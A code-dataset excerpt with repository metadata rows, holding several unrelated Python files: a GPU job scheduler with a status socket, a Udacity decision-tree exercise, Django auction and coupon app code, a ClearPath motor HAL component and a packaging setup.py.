finish_dict[job_name] = 0
epoch_waste_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
epoch_waste_dict[job_name] = 0
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
global K80_start_time
global V100_start_time, promote_start_time
global K80_job
global v100_job
global K80_time
global V100_time
global ovhd_a, ovhd_b, ovhd_c, ovhd_d, k80_1st, v100_1st, ovhd_start, overhead, ovhd_total
global b_start, c_start, d_start, completion
if 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
finish_dict[job_name] = 1
JCT[job] = int(time.time() - job_start[job])
if job in list(K80_job.values()):
K80_time[job] += int(time.time() - K80_start_time[job])
elif job in list(V100_job.values()):
V100_time[job] += int(time.time() - V100_start_time[job])
elif 'pid' in data_str:
global pid_dict
job_name = data_str.split(' ')[0]
pid = data_str.split(' ')[2]
pid_dict[job_name] = pid
elif 'checkpoint' in data_str: # can only be received after save signal is sent
global checkpoint_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
checkpoint_dict[job_name] = 1
ovhd_a[job].append(int(time.time() - ovhd_start[job]))
b_start[job] = time.time()
elif 'waste' in data_str:
global epoch_waste_dict
job_name = data_str.split(' ')[0]
epoch_waste_time = data_str.split(' ')[2]
epoch_waste_dict[job_name] += int(epoch_waste_time)
elif 'b_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_b[job].append(int(time.time() - b_start[job]))
c_start[job] = time.time()
elif 'c_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_c[job].append(int(time.time() - c_start[job]))
d_start[job] = time.time()
elif 'd_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_d[job].append(int(time.time() - d_start[job]))
ovhd_total[job].append(int(time.time() - ovhd_start[job]))
if ovhd_start[job] != 0:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
if job in list(K80_job.values()):
K80_start_time[job] = time.time()
elif job in list(V100_job.values()):
V100_start_time[job] = time.time()
promote_start_time[job] = time.time()
elif '1st_epoch' in data_str: # 'job50 1st_epoch 35'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
epoch_time = int(data_str.split(' ')[2])
if job in list(K80_job.values()):
k80_1st[job].append(epoch_time)
elif job in list(V100_job.values()):
v100_1st[job].append(epoch_time)
elif 'completion' in data_str: # 'job50 completion 0.33'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
completion_portion = float(data_str.split(' ')[2])
completion[job] = completion_portion
if 'ckpt_qual' in data_str or 'finish' in data_str or 'checkpoint' in data_str:
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
if job in demote_list:
demote_list.remove(job)
################ check step1 finished job of K80 jobs and step 2 of V100 #################
check_step1_complete(list(V100_job.values()))
check_step2_complete(list(K80_job.values()))
for job in list(V100_job.values()):
if job not in qualified_job and job != 'idle':
x2 = 3600 / k80_time[job]
x1 = pwr_dict[job]
x3 = util_dict[job]
if x1 > 0:
if job in step1_job:
qualified_job.append(job)
print('job' + job + ' has been qualified for demotion')
speedup_pred = model.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100
speedup_dict[job] = speedup_pred
predict_dict[job] = speedup_pred
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
if all_jobs_started:
# this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete
promote_list = list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
else:
promote_list = []
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
# look at demote list
for gpu, job in V100_job.items():
if job != 'idle':
if job not in demote_list and job in step2_job and len(ovhd_total[job]) > 0:
job_speedup = speedup_dict[job] # 0.7
job_ovhd = np.mean(ovhd_total[job]) # 100
k80_1st_ovhd = np.mean(k80_1st[job]) - K80_epoch_time[job]
v100_1st_ovhd = np.mean(v100_1st[job]) - V100_epoch_time[job]
demote_qualify_time = (2 * job_ovhd + k80_1st_ovhd + v100_1st_ovhd) / job_speedup
if int(time.time() - promote_start_time[job]) > demote_qualify_time:
demote_list.append(job)
print('job' + job + 'qualified for demote for passing demote qualify time ' +
str(int(demote_qualify_time)))
elif job not in demote_list and job not in step2_job and job in qualified_job:
demote_list.append(job)
print('job' + job + 'qualified for demote for profiling')
if len(promote_list) > 0 or len(demote_list) > 0:
if all_jobs_started:
promoted, demoted = max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote)
else:
promoted, demoted = min_speedup_demotion(K80_job, demote_list)
if len(promoted) > 0:
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
checkpoint_finish_check = []
for gpu, job in K80_job.items():
if job in promoted:
save_job(K80_node, job)
if finish_dict['job'+job] != 1:
K80_time[job] += int(time.time() - K80_start_time[job])
checkpoint_finish_check.append(job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
# make sure demoted step1 job doesn't get promoted back before finishing profiling
if job in step1_job and job not in step2_job:
speedup_dict[job] = 0.01
save_job(V100_node, job)
if finish_dict['job'+job] != 1:
V100_time[job] += int(time.time() - V100_start_time[job])
checkpoint_finish_check.append(job)
V100_job[gpu] = 'idle'
V100_used -= 1
demote_list.remove(job)
# wait for all GPUs to be available
if len(checkpoint_finish_check) > 0:
while True:
time.sleep(5)
for job in checkpoint_finish_check[:]:
if checkpoint_dict['job'+job] == 1: # checkpoint has finished, gpu is free
print(job + ' checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
checkpoint_finish_check.remove(job)
# also check if job already finished before sending checkpoint signal
elif finish_dict['job'+job] == 1:
print(job + ' finished before receiving checkpoint signal')
checkpoint_finish_check.remove(job)
if len(checkpoint_finish_check) == 0:
break
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
V100_job[gpu] = job_new
resume_job(V100_node, gpu, job_new)
num_mig[job_new] += 1
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
print('job'+job_new+' has finished before checkpointing')
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if not all_jobs_started:
if V100_used < V100_cap:
V100_free = V100_cap - V100_used
for i in range(V100_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in V100_job.items():
if job == 'idle': # schedule new job here if idle
start_job(V100_node, gpu, job_new)
V100_job[gpu] = job_new
job_start[job_new] = time.time()
V100_start_time[job_new] = time.time()
index += 1
V100_used += 1
time.sleep(5) # don't communicate too often
break
elif index >= len(queue):
all_jobs_started = True
############## monitor GPU usage ############
usage = K80_used + V100_used
time_stamp = int(time.time() - queue_timer)
gpu_usage_time.append(time_stamp)
gpu_usage.append(usage)
total_completion = np.sum(list(completion.values()))
gpu_usage_completion.append(total_completion)
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
K80_time_name = testcase + '_K80_time.json'
V100_time_name = testcase + '_V100_time.json'
gpu_usage_name = testcase + '_gpu_usage.csv'
ovhd_a_name = testcase + '_ovhd_a.json'
ovhd_b_name = testcase + '_ovhd_b.json'
ovhd_c_name = testcase + '_ovhd_c.json'
ovhd_d_name = testcase + '_ovhd_d.json'
ovhd_total_name = testcase + '_ovhd_total.json'
k80_1st_name = testcase + '_k80_1st.json'
v100_1st_name = testcase + '_v100_1st.json'
speedup_name = 'speedup.json'
predict_name = 'predict.json'
demote_list_name = 'demote_list.json'
completion_name = 'completion.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
with open(K80_time_name, 'w') as fp3:
json.dump(K80_time, fp3, sort_keys=True, indent=4)
with open(V100_time_name, 'w') as fp3:
json.dump(V100_time, fp3, sort_keys=True, indent=4)
with open(ovhd_a_name, 'w') as fp3:
json.dump(ovhd_a, fp3, sort_keys=True, indent=4)
with open(ovhd_b_name, 'w') as fp3:
json.dump(ovhd_b, fp3, sort_keys=True, indent=4)
with open(ovhd_c_name, 'w') as fp3:
json.dump(ovhd_c, fp3, sort_keys=True, indent=4)
with open(ovhd_d_name, 'w') as fp3:
json.dump(ovhd_d, fp3, sort_keys=True, indent=4)
with open(ovhd_total_name, 'w') as fp3:
json.dump(ovhd_total, fp3, sort_keys=True, indent=4)
with open(k80_1st_name, 'w') as fp3:
json.dump(k80_1st, fp3, sort_keys=True, indent=4)
with open(v100_1st_name, 'w') as fp3:
json.dump(v100_1st, fp3, sort_keys=True, indent=4)
with open(speedup_name, 'w') as fp1:
json.dump(speedup_dict, fp1, sort_keys=True, indent=4)
with open(predict_name, 'w') as fp1:
json.dump(predict_dict, fp1, sort_keys=True, indent=4)
with open(demote_list_name, 'w') as fp1:
json.dump(demote_list, fp1, sort_keys=True, indent=4)
with open(completion_name, 'w') as fp1:
json.dump(completion, fp1, sort_keys=True, indent=4)
gpu_usage_time = np.asarray(gpu_usage_time)
gpu_usage = np.asarray(gpu_usage)
gpu_usage_completion = np.asarray(gpu_usage_completion)
rows = zip(gpu_usage_time, gpu_usage, gpu_usage_completion)
with open(gpu_usage_name, 'w') as f:
writer = csv.writer(f)
for row in rows:
writer.writerow(row)
| [
"[email protected]"
]
| |
ab12cc2538c903dfca478ff16c8508153a7312c9 | 994ea22f35c635fdf139af9282b0d3a3d86ea34a | /ud120-projects-intro_to_machine_learning/decision_tree/dt_author_id.py | 667e184f992ddbc3679ee4787f6ce8ba6bcc894a | []
| no_license | zjyx147/Udacity | ac371fbc5b5b456e88b411657ef5a28c3b071c6c | d86fadd537dbacc6f8142b043e71527b0448bae3 | refs/heads/master | 2022-06-23T14:25:41.242353 | 2019-06-20T20:12:13 | 2019-06-20T20:12:13 | 191,207,247 | 0 | 0 | null | 2022-06-21T22:07:35 | 2019-06-10T16:42:18 | DIGITAL Command Language | UTF-8 | Python | false | false | 1,128 | py | #!/usr/bin/python
"""
This is the code to accompany the Lesson 3 (decision tree) mini-project.
Use a Decision Tree to identify emails from the Enron corpus by author:
Sara has label 0
Chris has label 1
"""
import sys
from time import time
sys.path.append("../tools/")
from email_preprocess import preprocess
### features_train and features_test are the features for the training
### and testing datasets, respectively
### labels_train and labels_test are the corresponding item labels
features_train, features_test, labels_train, labels_test = preprocess()
#########################################################
### your code goes here ###
from sklearn import tree
from sklearn.metrics import accuracy_score
#features_train = features_train[:len(features_train)/100]
#labels_train = labels_train[:len(labels_train)/100]
clf = tree.DecisionTreeClassifier(min_samples_split=40)
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
print len(features_train[0])
print "accuracy: ", accuracy_score(pred, labels_test)
#########################################################
| [
"[email protected]"
]
| |
fd11ad2bc7dc9769012fedd041968541efec6284 | 9c21e49150c99751231ad399bdba1850bb60c88c | /finders/views.py | 2810a5c9ef7cfcac6aa72c7420545809a1090294 | [
"MIT"
]
| permissive | netvigator/auctions | 3ab4086cb0bfbc736b17ede4e928f3ead2b08a4c | fc3766226cc65ac8694dffc74e893ecff8e7d07c | refs/heads/main | 2023-05-25T15:55:01.249670 | 2023-05-06T14:51:12 | 2023-05-06T14:51:12 | 92,816,101 | 0 | 0 | MIT | 2023-02-16T05:24:34 | 2017-05-30T09:14:39 | Python | UTF-8 | Python | false | false | 10,419 | py | from django.conf import settings
from core.views import ( DetailViewGotModel, ListViewGotModel,
UpdateViewCanCancel, CreateViewCanCancel )
from django.http import HttpResponseRedirect
from .forms import ItemFoundForm, UserItemFoundForm
from .mixins import AnyReleventHitStarColsChangedMixin
from .models import ItemFound, UserItemFound, UserFinder
from core.mixins import ( GetPaginationExtraInfoInContext,
GetUserSelectionsOnPost,
TitleSearchMixin )
from core.utils import ( getDateTimeObjGotEbayStr, getEbayStrGotDateTimeObj,
sayMoreAboutHitsForThis )
from brands.models import Brand
from categories.models import Category
from models.models import Model
# ### views assemble presentation info ###
# ### keep views thin! ###
if settings.TESTING:
#
from pprint import pprint
#
maybePrint = print
maybePrettyP = pprint
#
else:
#
def maybePrint( *args ): pass
def maybePrettyP( *args ): pass
#
class FinderIndexView(
GetUserSelectionsOnPost,
GetPaginationExtraInfoInContext,
TitleSearchMixin,
ListViewGotModel ):
template_name = 'finders/index.html'
model = UserFinder
context_object_name = 'finders_list'
paginate_by = 100
def get_queryset( self ):
#
# ADS
# qs = super().get_queryset()
# sSelect = 'P'
#
# ListViewGotModel inherits from GetUserOrVisitingMixin
oUser, isVisiting = self.getUserOrVisiting()
#
sSelect = self.kwargs.get( 'select', 'A' )
#
if not sSelect: sSelect = 'A'
#
if sSelect == 'A': # all
qsGot = UserFinder.objects.filter(
iUser = oUser,
bListExclude = False,
).order_by( '-iHitStars', 'iMaxModel', 'tTimeEnd' )
#elif sSelect == 'P': # postive (non-zero hit stars)
# qsGot = UserFinder.objects.filter(
# iUser = oUser,
# iHitStars__isnull = False,
# bListExclude = False,
# ).order_by( '-iHitStars', 'iMaxModel', 'tTimeEnd' )
#
elif sSelect == 'D': # "deleted" (excluded from list)
qsGot = UserFinder.objects.filter(
iUser = oUser,
iHitStars__isnull = False,
bListExclude = True
).order_by( '-iHitStars', 'iMaxModel', 'tTimeEnd' )
#elif sSelect == 'Z': # iHitStars = 0
# qsGot = UserFinder.objects.filter(
# iUser = oUser,
# iHitStars = 0,
# bListExclude = False
# ).order_by( '-iHitStars', 'iMaxModel', 'tTimeEnd' )
#
elif sSelect == 'S': # Search
#
qsGot = super().get_queryset( *args, **kwargs )
#
# want to find the get_queryset() method of TitleSearchMixin
# not the get_queryset() method of ListViewGotModel
#
#
return qsGot
class ItemFoundDetailView( GetUserSelectionsOnPost, DetailViewGotModel ):
# get this from the finders list (top menu item)
model = UserFinder
parent = ItemFound
template_name = 'finders/detail.html'
form_class = UserItemFoundForm
def get_context_data( self, **kwargs ):
'''
want more info to the context data.
'''
context = super().get_context_data( **kwargs )
# qsThisItem = UserItemFound.objects.filter(
#
'''
{'object': <UserItemFound: FISHER FM 200 B FM STEREO TUBE TUNER 200B>,
'useritemfound': <UserItemFound: FISHER FM 200 B FM STEREO TUBE TUNER 200B>,
'view': <finders.views.ItemFoundDetailView object at 0x7f0669fa63c8>,
'model': <class 'finders.models.UserItemFound'>,\
'parent': <class 'finders.models.ItemFound'>}
'''
#
# DetailViewGotModel inherits from GetUserOrVisitingMixin
oUser, isVisiting = self.getUserOrVisiting()
#
qsThisItemAllHits = UserItemFound.objects.filter(
iItemNumb_id = context[ 'object' ].iItemNumb_id,
iUser = oUser,
bListExclude = False,
).order_by( '-iHitStars' )
#
if len( qsThisItemAllHits ) == 0:
#
qsThisItemAllHits = UserItemFound.objects.filter(
iItemNumb_id = context[ 'object' ].iItemNumb_id,
iUser = oUser,
).order_by( '-iHitStars' )
#
#
sayMoreAboutHitsForThis( qsThisItemAllHits )
#
context['HitsForThis'] = qsThisItemAllHits
#
context['isVisiting'] = isVisiting
#
session = self.request.session
#
session['iItemNumb' ] = context[ 'object' ].iItemNumb_id
#
if len( qsThisItemAllHits ) == 0:
session['iSearch'] = None
else:
session['iSearch'] = qsThisItemAllHits[0].iSearch_id
#
# cannot serialize datetime object, so covert to string
#
session['sTimeEnd' ] = getEbayStrGotDateTimeObj(
context[ 'object' ].tTimeEnd )
#
return context
"""
class ItemFoundHitView( GetUserSelectionsOnPost, DetailViewGotModel ):
# get this from the list at bottom for a model, brand or category
model = UserItemFound
parent = ItemFound
template_name = 'finders/hit-detail.html'
form_class = UserItemFoundForm
def get_context_data( self, **kwargs ):
'''
want more info to the context data.
'''
context = super().get_context_data( **kwargs )
#
# qsThisItem = UserItemFound.objects.filter(
#
'''
{'object': <UserItemFound: FISHER FM 200 B FM STEREO TUBE TUNER 200B>,
'useritemfound': <UserItemFound: FISHER FM 200 B FM STEREO TUBE TUNER 200B>,
'view': <finders.views.ItemFoundDetailView object at 0x7f0669fa63c8>,
'model': <class 'finders.models.UserItemFound'>,\
'parent': <class 'finders.models.ItemFound'>}
'''
#
qsThisItemOtherHits = UserItemFound.objects.filter(
iItemNumb_id = context[ 'object' ].iItemNumb_id,
iUser = context[ 'object' ].iUser,
bListExclude = False
).exclude( id = context[ 'object' ].id
).order_by( '-iHitStars' )
#
context['HitsForThis'] = qsThisItemOtherHits
#
session = self.request.session
#
session['iItemNumb'] = context[ 'object' ].iItemNumb_id
#
session['iSearch'] = \
context['object'].iSearch_id or qsThisItemOtherHits[0].iSearch_id
#
return context
"""
class ItemFoundUpdateView(
AnyReleventHitStarColsChangedMixin, UpdateViewCanCancel ):
model = UserItemFound
parent = ItemFound
template_name = 'finders/edit.html'
success_message = 'Finder update successfully saved!!!!'
form_class = UserItemFoundForm
tHitStarRelevantCols = (
'iModel',
'iBrand',
'iCategory' )
def get_context_data( self, **kwargs ):
'''
want more info to the context data.
'''
#
context = super().get_context_data( **kwargs )
#
context['form'].fields['iBrand'].queryset = \
Brand.objects.filter( iUser = self.request.user )
context['form'].fields['iCategory'].queryset = \
Category.objects.filter( iUser = self.request.user )
#
instance = context['form'].instance
#
if instance.iBrand is not None:
context['form'].fields['iModel'].queryset = \
Model.objects.filter(
iUser = self.request.user,
iBrand = instance.iBrand )
else:
context['form'].fields['iModel'].queryset = \
Model.objects.filter( iUser = self.request.user )
#
# session = self.request.session
#
# print( "instance.iItemNumb_id:", instance.iItemNumb_id )
# print( "instance.iBrand:", instance.iBrand )
# print( "session['iItemNumb'] :", session['iItemNumb'] )
#
return context
class ItemFoundCreateView( CreateViewCanCancel ):
model = UserItemFound
parent = ItemFound
template_name = 'finders/add.html'
success_message = 'New finder successfully saved!!!!'
form_class = UserItemFoundForm
def get_initial( self ):
#
initial = super().get_initial()
#
# in testing, values might not be there
#
session = self.request.session
#
if session and 'iItemNumb' in session:
#
initial['iItemNumb'] = session['iItemNumb']
initial['iSearch' ] = session['iSearch' ]
initial['tTimeEnd' ] = getDateTimeObjGotEbayStr( session['sTimeEnd' ] )
initial['iUser' ] = self.request.user
#
#
return initial
def troubleshoot_form_valid( self, form ):
#
instance = form.instance
#session = self.request.session
##
#instance.iItemNumb_id = instance.iItemNumb_id or session['iItemNumb']
#instance.iSearch_id = instance.iSearch_id or session['iSearch' ]
#instance.tTimeEnd = instance.tTimeEnd or session['tTimeEnd' ]
#instance.iUser = self.request.user
#
maybePrint( 'iItemNumb_id, iSearch_id, tTimeEnd, iUser:',
instance.iItemNumb_id,
instance.iSearch_id,
instance.tTimeEnd,
instance.iUser )
#
return super().form_valid( form )
| [
"[email protected]"
]
| |
d56e7846c82c52f70ed8995eae5b8812797b0c59 | 8f6aa9ac9c8c2e409875bbf36fbc49b3eb37d88b | /enthought/blocks/parser_.py | f1a794e50470f6bace4dc005a1697707cf3acf70 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | enthought/etsproxy | 5660cf562c810db2ceb6b592b6c12274bce96d73 | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | refs/heads/master | 2023-03-27T04:51:29.297305 | 2020-12-02T09:05:18 | 2020-12-02T09:05:18 | 1,632,969 | 3 | 1 | NOASSERTION | 2020-12-02T09:05:20 | 2011-04-18T22:29:56 | Python | UTF-8 | Python | false | false | 93 | py | # proxy module
from __future__ import absolute_import
from codetools.blocks.parser_ import *
| [
"[email protected]"
]
| |
c9bbb18d49a220a9c5dba67e26b75ee3e9d1b3c3 | ad1ff82d1361f76b043faa304aa3b7be3652b303 | /tools/supervisor.py | 40f2f0a9c939658268aa3ae39a028bf539add829 | []
| no_license | jon--lee/aor | 3a0f92e345a88c347146acba4b9f7513a3a986cf | 4a4cd8800dfc209c382507740e68586b34178a1b | refs/heads/master | 2020-06-10T05:31:51.179020 | 2019-06-24T23:48:24 | 2019-06-24T23:48:24 | 193,597,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | import numpy as np
from expert import tf_util
class Supervisor():
def __init__(self, act):
self.act = act
def sample_action(self, s):
return self.intended_action(s)
def intended_action(self, s):
action = self.act(s[None], stochastic=False)[0]
return action
class Supervisor2():
def __init__(self, policy_fn, sess):
self.policy_fn = policy_fn
self.sess = sess
with self.sess.as_default():
tf_util.initialize()
def sample_action(self, s):
with self.sess.as_default():
intended_action = self.policy_fn(s[None,:])[0]
return intended_action
def intended_action(self, s):
return self.sample_action(s)
class Supervisor3():
def __init__(self, act):
self.act = act
def sample_action(self, s):
return self.intended_action(s)
def intended_action(self, s):
action = self.act(False, s)[0]
return action
| [
"[email protected]"
]
| |
285bb70b43f6c87ac58cc9c0d7d50b7983f5ac64 | 8b57df3640fd9a726a8729c051dc27dbaee16059 | /notify/apps.py | 985c0feae7a585b8cbecad503a2120d658c0dc2f | []
| no_license | sinjorjob/django-notification-function | 86678df54e12b58a2feb315f10fde585412a2029 | 15ba6111474641498dbcd83ea0bd06d40b348387 | refs/heads/master | 2023-05-31T13:41:26.147761 | 2021-06-26T07:05:31 | 2021-06-26T07:05:31 | 380,437,265 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | from django.apps import AppConfig
class NotifyConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'notify'
| [
"[email protected]"
]
| |
09ac2327168508b61c167a4490edbc965fda67e3 | 7a55d3fac2bc2b7afd46300182944d3cb1b8a370 | /clearpath/clearpath | a0265890c276994cb6ac2240c003f7c7a579b66e | []
| no_license | btownshend/CNCConfig | 5d3eca22573c0534ce0b5c43a6958c2d5011a992 | bdadea7bacf4c5d373faeab30f31b1d5145fb3d3 | refs/heads/main | 2023-03-16T16:11:44.071625 | 2021-03-14T22:08:10 | 2021-03-14T22:08:10 | 329,538,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,415 | #!/usr/bin/env python
import ctypes
import hal, time
import sys,os
print('sys.argv[0] =', sys.argv[0])
pathname = os.path.dirname(sys.argv[0])
print('path =', pathname)
lib=ctypes.CDLL(pathname+"/getstatus.so")
print('getstatus.so loaded')
h=hal.component("clearpath")
h.newpin("0.fault",hal.HAL_BIT,hal.HAL_OUT)
h.newpin("1.fault",hal.HAL_BIT,hal.HAL_OUT)
h.newpin("0.enable",hal.HAL_BIT,hal.HAL_IN)
h.newpin("1.enable",hal.HAL_BIT,hal.HAL_IN)
print('components/pins created')
try:
if lib.initialize() < 0:
print("Unable to initialize ClearPath SC-HUB connection")
raise SystemExit
print("initialized")
print(dir(h))
h.ready()
print("ready")
while True:
time.sleep(0.25)
#print("update")
if lib.setenable(0,h['0.enable']) < 0:
print("clearpath: failed to setenable for port 0")
h['0.fault']=1
continue
if lib.setenable(1,h['1.enable']) < 0:
print("clearpath: failed to setenable for port 1")
h['1.fault']=1
continue
s0=lib.getstatus(0)
if s0<0:
print("clearpath: getstatus(0) failed")
h['0.fault']=(s0!=0)
s1=lib.getstatus(1)
if s1<0:
print("clearpath: getstatus(1) failed")
h['1.fault']=(s1!=0)
except KeyboardInterrupt:
lib.shutdown()
raise SystemExit
| [
"[email protected]"
]
| ||
fe52b2cd35017acf657af7d8ab0cb4f759250d7a | 0e08e9873549c514245842c5f4ad01769e1c76d6 | /myblog/blog/tests.py | ec7bc624daecb07dd9bc9025f52c0c33afa1036c | []
| no_license | liangxs0/Django_study | 39afe9c889467eb81e2ecdcee4e285c2bd27d28a | 2f509bce6cdaaee288c37a603978a96ffc43f0e4 | refs/heads/main | 2023-04-25T20:30:05.275066 | 2021-05-31T03:27:24 | 2021-05-31T03:27:24 | 372,365,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | # from django.test import TestCase
# #
#
# from django.contrib.auth.hashers import make_password, check_password
# # # Create your tests here.
# x = make_password("123", 'abc', 'pbkdf2_sha256')
# y = make_password("123", 'abc', 'pbkdf2_sha256')
# print(x)
# print(y)
def a(nums):
nums = [str(n) for n in nums]
n_nums = []
for n in nums:
for nn in n:
n_nums.append(nn)
print(n_nums)
n_nums.sort(reverse=True)
print(n_nums)
res = ''
for n in n_nums:
res+=n
return res
c = "".join([3,30,34,5,9])
print(c) | [
"[email protected]"
]
| |
807b8f72c43040317da699074158ef426c15575e | 6bb45c5892b4c9692dcc44116fb73dc9e7ab90ff | /advanced_functionality/autogluon-sagemaker-pipeline/setup.py | 56a675d8c0cac3a064199a11bd56e8e1316b0dce | [
"Apache-2.0",
"BSD-2-Clause"
]
| permissive | aws/amazon-sagemaker-examples | 8359afe544e873662bda5b8d2b07399c437213c9 | 43dae4b28531cde167598f104f582168b0a4141f | refs/heads/main | 2023-08-26T04:42:52.342776 | 2023-08-25T14:37:19 | 2023-08-25T14:37:19 | 107,937,815 | 4,797 | 3,519 | Apache-2.0 | 2023-09-14T19:47:03 | 2017-10-23T05:55:22 | Jupyter Notebook | UTF-8 | Python | false | false | 1,569 | py | import os
import setuptools
about = {}
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "pipelines", "__version__.py")) as f:
exec(f.read(), about)
with open("README.md", "r") as f:
readme = f.read()
required_packages = ["sagemaker"]
extras = {
"test": [
"black",
"coverage",
"flake8",
"mock",
"pydocstyle",
"pytest",
"pytest-cov",
"sagemaker",
"tox",
]
}
setuptools.setup(
name=about["__title__"],
description=about["__description__"],
version=about["__version__"],
author=about["__author__"],
author_email=["__author_email__"],
long_description=readme,
long_description_content_type="text/markdown",
url=about["__url__"],
license=about["__license__"],
packages=setuptools.find_packages(),
include_package_data=True,
python_requires=">=3.6",
install_requires=required_packages,
extras_require=extras,
entry_points={
"console_scripts": [
"get-pipeline-definition=pipelines.get_pipeline_definition:main",
"run-pipeline=pipelines.run_pipeline:main",
]
},
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
)
| [
"[email protected]"
]
| |
55f2794ab24a2c74169da65c168ce04bb3914a86 | 384a612001a5fdd5d089898f13cc7aef3b954a6e | /coupons/models.py | a70532afc380b7291804bb0f539e35ea14a9e0e6 | []
| no_license | purum01/test_django_onlineshop | f3a9c4d12d4077ea69cb9ad372e5acc5243379b7 | c4a40a273a512c939a364bee91bab950559d0f87 | refs/heads/main | 2023-06-14T12:11:05.614611 | 2021-07-03T14:34:01 | 2021-07-03T14:34:01 | 380,695,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | from django.db import models
from django.core.validators import MinValueValidator, MaxValueValidator
class Coupon(models.Model):
code = models.CharField(max_length=50, unique=True)
valid_from = models.DateTimeField()
valid_to = models.DateTimeField()
discount = models.IntegerField(validators=[MinValueValidator(0),MaxValueValidator(100)])
active = models.BooleanField()
def __str__(self):
return self.code
| [
"[email protected]"
]
| |
